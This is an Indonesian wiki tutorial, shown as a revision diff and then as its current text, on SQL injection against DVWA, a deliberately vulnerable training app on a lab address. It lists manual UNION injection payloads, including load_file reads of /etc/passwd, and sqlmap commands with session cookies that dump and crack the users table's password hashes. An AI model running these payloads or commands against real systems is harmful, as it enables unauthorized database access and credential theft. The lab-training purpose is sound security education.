Difference between revisions of "SQLMap: Contoh SQL Injection ke DVWA"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| (4 intermediate revisions by the same user not shown) | |||
| Line 7: | Line 7: | ||
==Proses manual untuk test Vulnerability== | ==Proses manual untuk test Vulnerability== | ||
| + | |||
| + | Dalam DVWA | ||
| + | |||
| + | Original Query | ||
| + | |||
| + | SELECT first_name, last_name FROM users WHERE user_ID = '$id' | ||
| + | |||
| + | Exploited Query | ||
| + | |||
| + | SELECT first_name, last_name FROM users WHERE user_ID = '' union select user, password from dvwa.users -- ' | ||
| + | |||
| + | |||
| + | |||
Cek apakah situs kita vulnerable | Cek apakah situs kita vulnerable | ||
| Line 35: | Line 48: | ||
Kita tahu bahwa 1,2,3 akan memberikan kita error kumpulan data hanya ada 2 kolom. | Kita tahu bahwa 1,2,3 akan memberikan kita error kumpulan data hanya ada 2 kolom. | ||
| − | |||
| − | |||
==Menggunakan SQLMAP== | ==Menggunakan SQLMAP== | ||
| Line 43: | Line 54: | ||
-u URL yang dituju | -u URL yang dituju | ||
| − | -cookie mengirimkan / mengemulasi sebuah cookie header | + | --cookie mengirimkan / mengemulasi sebuah cookie header |
Untuk memperoleh cookie, kita perlu mendapatkannya misalnya dengan firefox addon tamper data. Contoh | Untuk memperoleh cookie, kita perlu mendapatkannya misalnya dengan firefox addon tamper data. Contoh | ||
| Line 49: | Line 60: | ||
Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7 | Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7 | ||
| − | -dbs Ini akan memberikan daftar database jika sukses dilakukan. | + | --dbs Ini akan memberikan daftar database jika sukses dilakukan. |
-D Ini untuk menentukan database yang diserang. | -D Ini untuk menentukan database yang diserang. | ||
| − | -tables untuk melihat daftar tabel dari database -D parm. | + | --tables untuk melihat daftar tabel dari database -D parm. |
| − | -columns untuk melihat kolom di -tables parm | + | --columns untuk melihat kolom di -tables parm |
| − | -current-user untuk melihat current user yang menjalankan SQL | + | --current-user untuk melihat current user yang menjalankan SQL |
| − | -users untuk melihat semua users dari SQL | + | --users untuk melihat semua users dari SQL |
| − | -passwords untuk memberikan password yang di hash dari SQL instance. | + | --passwords untuk memberikan password yang di hash dari SQL instance. |
==Contoh Eksekusi== | ==Contoh Eksekusi== | ||
| + | ===Cek daftar database yang ada=== | ||
| + | |||
| + | sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' | ||
| + | --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" --dbs | ||
| + | |||
| + | hasilnya | ||
| + | |||
| + | [07:02:08] [INFO] fetching database names | ||
| + | available databases [7]: | ||
| + | [*] dvwa | ||
| + | [*] information_schema | ||
| + | [*] mediawiki | ||
| + | [*] moodle | ||
| + | [*] mysql | ||
| + | [*] performance_schema | ||
| + | [*] snort | ||
| + | |||
| + | ===Cek daftar tabel dari database dvwa=== | ||
| + | |||
| + | |||
| + | sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' | ||
| + | --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa --tables | ||
| + | |||
| + | |||
| + | Hasilnya | ||
| + | |||
| + | [07:08:39] [INFO] fetching tables for database: 'dvwa' | ||
| + | [07:08:39] [WARNING] reflective value(s) found and filtering out | ||
| + | Database: dvwa | ||
| + | [2 tables] | ||
| + | +-----------+ | ||
| + | | guestbook | | ||
| + | | users | | ||
| + | +-----------+ | ||
| + | |||
| + | |||
| + | ===Cek format kolom tabel users=== | ||
| − | sqlmap -u http://192.168.0.80/DVWA-1.0.8/vulnerabilities/ | + | sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' |
| + | --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --columns | ||
| + | Hasilnya | ||
| + | [07:11:51] [INFO] fetching columns for table 'users' in database 'dvwa' | ||
| + | [07:11:51] [WARNING] reflective value(s) found and filtering out | ||
| + | Database: dvwa | ||
| + | Table: users | ||
| + | [6 columns] | ||
| + | +------------+-------------+ | ||
| + | | Column | Type | | ||
| + | +------------+-------------+ | ||
| + | | user | varchar(15) | | ||
| + | | avatar | varchar(70) | | ||
| + | | first_name | varchar(15) | | ||
| + | | last_name | varchar(15) | | ||
| + | | password | varchar(32) | | ||
| + | | user_id | int(6) | | ||
| + | +------------+-------------+ | ||
| − | + | ===dump password=== | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | + | sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' | |
| − | + | --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --dump | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | sqlmap -u | ||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | + | --dump akan meng-crack password yang di hash. Anda akan ditanya apakah akan menggunakan dictionary yang ada di SQLMAP atau dictionary kita sendiri. | |
| − | + | Hasilnya | |
| − | [15:21: | + | [07:15:16] [INFO] using hash method 'md5_generic_passwd' |
| − | [15: | + | what dictionary do you want to use? |
| − | [15: | + | [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) |
| − | [15: | + | [2] custom dictionary file |
| − | [15: | + | [3] file with list of dictionary files |
| − | [15: | + | > 1 |
| − | Database: dvwa | + | [07:15:21] [INFO] using default dictionary |
| − | Table: users | + | do you want to use common password suffixes? (slow!) [y/N] y |
| − | [5 entries] | + | [07:15:30] [INFO] starting dictionary-based cracking (md5_generic_passwd) |
| − | + | + | [07:15:30] [INFO] starting 2 processes |
| − | | user_id | user | password | + | [07:15:35] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03' |
| − | + | + | [07:15:42] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b' |
| − | | 1 | + | [07:15:50] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7' |
| − | | 2 | + | [07:15:54] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99' |
| − | | 3 | + | [07:16:00] [INFO] postprocessing table dump |
| − | | 4 | + | Database: dvwa |
| − | | 5 | + | Table: users |
| − | + | + | [5 entries] |
| + | +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+ | ||
| + | | user_id | user | avatar | password | last_name | first_name | | ||
| + | +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+ | ||
| + | | 1 | admin | dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | | ||
| + | | 2 | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | | ||
| + | | 3 | 1337 | dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | | ||
| + | | 4 | pablo | dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | | ||
| + | | 5 | smithy | dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | | ||
| + | +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+ | ||
| − | + | Maka kita memperoleh password dari semua sql user :) | |
==Referensi== | ==Referensi== | ||
* http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/ | * http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/ | ||
Latest revision as of 05:56, 4 March 2017
Sumber: http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/
Latar Belakang
Sebelum menggunakan SQLMAP akan sangat baik jika kita dapat melihat apakah injection dapat dilakukan. SQLMAP hanya alat bantu saja, sebaiknya kita mengetahui proses-nya secara manual. Semua SQLMAP fitur dapat dilakukan secara manual.
Proses manual untuk test Vulnerability
Dalam DVWA
Original Query
SELECT first_name, last_name FROM users WHERE user_ID = '$id'
Exploited Query
SELECT first_name, last_name FROM users WHERE user_ID = union select user, password from dvwa.users -- '
Cek apakah situs kita vulnerable
1′ or ’2′=’2
Kita perlu melihat berapa banyak kolom sebelum ada error.
‘ and 1=1 union select 1,2 # ‘ and 1=1 union select 1,2,3 #
Ini akan memperlihatkan bahwa tabel-nya hanya ada 2 kolom.
Mari kita melakukan injection.
‘ union SELECT 1, user() — ‘ ‘ and 1=1 union select database(),version() # ‘ union SELECT 1, user() # ‘ and 1=1 union select null,table_schema from information_schema.tables # ‘ and 1=1 union select table_name,table_schema from information_schema.tables # ‘ and 1=1 union select table_name,table_schema from information_schema.tables where table_schema=’dvwa’ # ‘ and 1=1 union select first_name,password from dvwa.users # ‘ union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ # ‘ union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘user_id’ # ‘ union select user, password FROM users # ‘ union SELECT 1, load_file(‘/etc/hosts’) # ‘ union SELECT 1, load_file(‘/etc/passwd’) #
Kita tahu bahwa 1,2,3 akan memberikan kita error kumpulan data hanya ada 2 kolom.
Menggunakan SQLMAP
Parameter yang kita gunakan & artinya
-u URL yang dituju --cookie mengirimkan / mengemulasi sebuah cookie header
Untuk memperoleh cookie, kita perlu mendapatkannya misalnya dengan firefox addon tamper data. Contoh
Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7
--dbs Ini akan memberikan daftar database jika sukses dilakukan. -D Ini untuk menentukan database yang diserang. --tables untuk melihat daftar tabel dari database -D parm. --columns untuk melihat kolom di -tables parm --current-user untuk melihat current user yang menjalankan SQL --users untuk melihat semua users dari SQL --passwords untuk memberikan password yang di hash dari SQL instance.
Contoh Eksekusi
Cek daftar database yang ada
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" --dbs
hasilnya
[07:02:08] [INFO] fetching database names available databases [7]: [*] dvwa [*] information_schema [*] mediawiki [*] moodle [*] mysql [*] performance_schema [*] snort
Cek daftar tabel dari database dvwa
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa --tables
Hasilnya
[07:08:39] [INFO] fetching tables for database: 'dvwa' [07:08:39] [WARNING] reflective value(s) found and filtering out Database: dvwa [2 tables] +-----------+ | guestbook | | users | +-----------+
Cek format kolom tabel users
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --columns
Hasilnya
[07:11:51] [INFO] fetching columns for table 'users' in database 'dvwa' [07:11:51] [WARNING] reflective value(s) found and filtering out Database: dvwa Table: users [6 columns] +------------+-------------+ | Column | Type | +------------+-------------+ | user | varchar(15) | | avatar | varchar(70) | | first_name | varchar(15) | | last_name | varchar(15) | | password | varchar(32) | | user_id | int(6) | +------------+-------------+
dump password
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --dump
--dump akan meng-crack password yang di hash. Anda akan ditanya apakah akan menggunakan dictionary yang ada di SQLMAP atau dictionary kita sendiri.
Hasilnya
[07:15:16] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 [07:15:21] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] y [07:15:30] [INFO] starting dictionary-based cracking (md5_generic_passwd) [07:15:30] [INFO] starting 2 processes [07:15:35] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03' [07:15:42] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b' [07:15:50] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7' [07:15:54] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99' [07:16:00] [INFO] postprocessing table dump Database: dvwa Table: users [5 entries] +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+ | user_id | user | avatar | password | last_name | first_name | +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+ | 1 | admin | dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | | 2 | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | | 3 | 1337 | dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | | 4 | pablo | dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | | 5 | smithy | dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
Maka kita memperoleh password dari semua sql user :)